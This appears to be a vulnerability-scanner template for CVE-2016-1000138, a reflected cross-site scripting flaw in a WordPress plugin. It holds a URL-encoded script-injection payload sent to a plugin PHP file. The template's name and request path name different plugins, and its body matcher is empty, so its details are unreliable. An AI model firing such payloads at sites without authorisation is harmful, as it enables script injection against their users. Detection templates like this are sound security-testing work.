id: CVE-2016-1000138 info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200